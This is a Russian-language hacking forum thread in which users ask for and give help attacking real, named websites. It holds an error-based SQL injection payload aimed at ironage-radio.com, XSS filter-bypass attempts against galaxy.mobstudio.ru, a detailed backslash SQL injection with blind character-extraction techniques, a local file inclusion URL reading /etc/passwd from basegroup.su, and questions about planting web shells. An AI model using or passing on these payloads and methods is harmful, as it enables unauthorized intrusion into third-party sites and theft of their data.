Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://ironage-radio.com/'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1+--+

    extractvalue тоже катит, пробуй сам
     
    _________________________
    1 person likes this.
  3. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Нашел xss но вот
    фильтр съедает всё что в скобках <> сначала думал съедает скрипт
    проверил съедает всё что внутри <> как обойти фильтрацию, помогите
    пожалуйста
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Надо смотреть на месте. Двойные << пропускает? Что ещё пропускает?

    Если хотите получить помощь - формулируйте свои вопросы как можно чётче и, пожалуйста, указывайте сайты для тестирования.
     
    _________________________
  5. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    нет двойные тоже не пропускают. Когда впереди пишу <<<<<>>>> то пропускает но скрипт не выполняется. Как понял фильтр находит открытие и закрытые скобок и удаляет .
     
  6. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    когда пишу так <<<>>> <sc<script>ript>alert("")</sc</
    script>ript> то вижу это после фильтрации <script>alert("") </sc</ script> но сам скрипт не выполняется
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Нужен сам скрипт для тестирования. Вариантов куча может быть.
     
    _________________________
  8. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    вот сайт galaxy.mobstudio.ru/web в любой поле вводишь кроме смс в эфир то съедает всё что внутри скобок. проверь пожалуйста
     
  9. aadktnbaov

    aadktnbaov New Member

    Joined:
    6 Jun 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    прошу помощи для совершения sql-инъекции

    Всем доброго времени суток.

    Прошу помощи извлечь полезную информацию из базы данных, используя sql-инъекцию.

    Недавно на некотором сайте обнаружил возможность sql-инъекции:
    в передаваемом post-параметре НЕ фильтруется обратный слэш ( \ ; ascii-код = 92 = 0x5C ).

    Если заполнить текстовый input с именем ID значением 12345 , а другой текстовый input с именем VarXXX значением 67890\ и за-SUBMIT-ить форму - то сайт вернет следущую ошибку:
    Ошибка сервера Базы Данных MySQL!
    Ошибка:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''67890\' AND `id`=12345' at line 1

    Номер ошибки:
    1064

    и далее подробности ошибки (ошибочный sql-запрос):
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='67890\' AND `id`=12345


    "Одинарная" кавычка ( ' = апостроф ; ascii-код = 39 = 0x27 ) и "двойная" кавычка ( " ; ascii-код = 34 = 0x22 ) , а также + (знак плюса) фильтруются (вырезаются) ,вероятно, на уровне php.
    Если , например, заполнить текстовый input с именем ID значением 5'4321 , а другой текстовый input с именем VarXXX значением 0'9876\ - то сайт вернет ошибку со следущими подробностями:
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321
    Если , например, заполнить текстовый input с именем ID значением 5"4321 , а другой текстовый input с именем VarXXX значением 0"9876\ - то сайт вернет ошибку с теми же самыми подробностями:
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321

    Символы !#$%&()*,-./:;<=>?@[\]^_`{|}~ , а также пробел не фильтруются
    Если , например, заполнить текстовый input с именем ID значением 777 , а другой текстовый input с именем VarXXX значением 11!#$%&()*,-./:;<=>?@[\]^_`{|}~ 22 - то сайт вернет ошибку со следущими подробностями:
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='11!#$%&()*,-./:;<=>?@[\]^_`{|}~ 22\' AND `id`=777


    Подобным образом выяснилось, что значения из текстового input-а с именем ID приводятся только к числовому виду таким образом, что первый в строке любой нецифровой символ (или буква) , а также всё, что идёт после него (или неё), - вырезается.
    Если , например, заполнить текстовый input с именем ID значением 123d456 , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=123
    Если же , например, заполнить текстовый input с именем ID значением 0xff , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:
    SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=0


    Что можно полезного поиметь в этом случае ?


    P.S.
    названия INPUT-ов , а также названия столбцов и таблицы в БД умышленно мною изменены
     
  10. aadktnbaov

    aadktnbaov New Member

    Joined:
    6 Jun 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    а что мешает тебе извлекать любую необходимую тебе строку по одному символу ?
    ord(mid(user(),1,1)) - ascii-код первого символа пльзователя
    ord(mid(user(),2,1)) - ascii-код второго символа пльзователя
    ord(mid(user(),3,1)) - ascii-код третьего символа пльзователя
    и .т.д.


    P.S. учи "мат. часть"


    функция MID() = SUBSTRING()
    Return a substring starting from the specified position


    MID(str,pos,len) is a synonym for SUBSTRING(str,pos,len).

    SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

    The forms without a len argument return a substring from string str starting at position pos. The forms with a len argument return a substring len characters long from string str, starting at position pos. The forms that use FROM are standard SQL syntax. It is also possible to use a negative value for pos. In this case, the beginning of the substring is pos characters from the end of the string, rather than the beginning. A negative value may be used for pos in any of the forms of this function.

    For all forms of SUBSTRING(), the position of the first character in the string from which the substring is to be extracted is reckoned as 1.
    mysql> SELECT SUBSTRING('Quadratically',5);
    -> 'ratically'
    mysql> SELECT SUBSTRING('foobarbar' FROM 4);
    -> 'barbar'
    mysql> SELECT SUBSTRING('Quadratically',5,6);
    -> 'ratica'
    mysql> SELECT SUBSTRING('Sakila', -3);
    -> 'ila'
    mysql> SELECT SUBSTRING('Sakila', -5, 3);
    -> 'aki'
    mysql> SELECT SUBSTRING('Sakila' FROM -4 FOR 2);
    -> 'ki'

    This function is multi-byte safe.

    If len is less than 1, the result is the empty string.





    функция ORD() = ASCII() Return character code for leftmost character of the argument

    If the leftmost character of the string str is a multi-byte character, returns the code for that character, calculated from the numeric values of its constituent bytes using this formula:
    (1st byte code)
    + (2nd byte code * 256)
    + (3rd byte code * 2562) ...

    If the leftmost character is not a multi-byte character, ORD() returns the same value as the ASCII() function.
    mysql> SELECT ORD('2');
    -> 50

    ASCII(str) - аналог полный аналог функции ord() , но для строк , состоящих из 8-битных символов
    Returns the numeric value of the leftmost character of the string str. Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII() works for 8-bit characters.
    mysql> SELECT ASCII('2');
    -> 50
    mysql> SELECT ASCII(2);
    -> 50
    mysql> SELECT ASCII('dx');
    -> 100
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    1)кто в курсах как залить шелл через TinyBrowser, в гугле ненашол
     
    #21391 qaz, 14 Nov 2012
    Last edited: 15 Nov 2012
  12. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Я спрашивал - Как наиболее эффективно ей воспользоваться.
    А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.
    Пока делаю по своему, вытягиваю по несколько символов за раз.
     
  13. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Вопрос по LFI.

    Ну вот qaz пытался мне помочь, но не смог.
    Помогите выжать максимум из LFI, не получается.
     
  14. aadktnbaov

    aadktnbaov New Member

    Joined:
    6 Jun 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0

    BLIND-ануть - это значит применить sql-инъекцию "вслепую"
    без вывода резьтата куда-либо в явном виде
    см. перевод англ. слова "BLIND"

    чаще всего подразумевает под собой применение инъекции с двояким резьтатом её исполнения ( true , false значение )

    например, результат инъекции может быть либо "нормальной" страницей , либо пустой страницей

    с помощью такой "слепой" инъекции можно методом "тупого" ПЕРЕБОРА (ну или "умного", если хорошо понимаешь , какие именно данные хочешь извлечь и как оптимизировать этот самый "тупой" подбор ) вытянуть нужные данные из базы

    В Вашем же случае инъекция ни разу не BLIND
    данные в базе Вы изменяете с помощью update-инъекции и затем можете увидеть изменения в явном виде
    HEX-хуекс или BASE64 вместо желанного plain text - это уже не важно
    из Вашего HEX-a даныне легко преобразовать к оригиналу (желанному plain text ).
     
  15. aadktnbaov

    aadktnbaov New Member

    Joined:
    6 Jun 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0

    могу посоветовать оптимизировать вытягивание даныне Вашим replace-ом

    но не так
    001 , 002 , 003 , 004, 005 , 006
    вместо
    a , b , с , d , e , f

    а так
    01 , 02 , 03, 04 , 05 , 06
    вместо
    a , b , с , d , e , f


    врядли в изначальной строке будут символы с ascii-кодами , начинающимися на 0 в хексе

    т.е. строка hex('admin') = 61646D696E
    в вашем случае преобразуется в 616460469605

    далее проанализировав по четности месторасположения нуля в строке , нетрудно понять где именно менялись буквенные символы хекса
     
    1 person likes this.
  16. p1oneer

    p1oneer Member

    Joined:
    23 Dec 2008
    Messages:
    192
    Likes Received:
    19
    Reputations:
    2
    Как можно реализовать FTP-соединение на шелле? Подскажите несложные способы или дайте ссылки, где есть мануалы по этому, буду очень благодарен.
     
  17. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.basegroup.su/index.php?Page=../../../../../etc/passwd
    в частности, есть какая либо утилита-скрипт которая приводит в читабельный вид файл passwd? спрашиваю чисто из-за любопытсва и на будущее. паролей то там нет как я понимаю? в даном случае используются shadow пароли?но получить доступк /etc/shadow на данном ресурсе при помощи LFI не представляется возможным.вобще какой толк от этого файла, если только это не какая то экзотическая рухлядь, где пароли ещё не вынесены из passwd?
     
    #21397 mod_, 16 Nov 2012
    Last edited: 21 Nov 2012
  18. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    rooting -> cat /etc/passwd --> ftp connecting.
     
    _________________________
  19. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    не получается залить шелл,т.е. я могу лить любые форматы,но они не работают как пхп,а открываются txt, как можно залиться?
     
  20. p1oneer

    p1oneer Member

    Joined:
    23 Dec 2008
    Messages:
    192
    Likes Received:
    19
    Reputations:
    2
    "passwd" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
     
Thread Status:
Not open for further replies.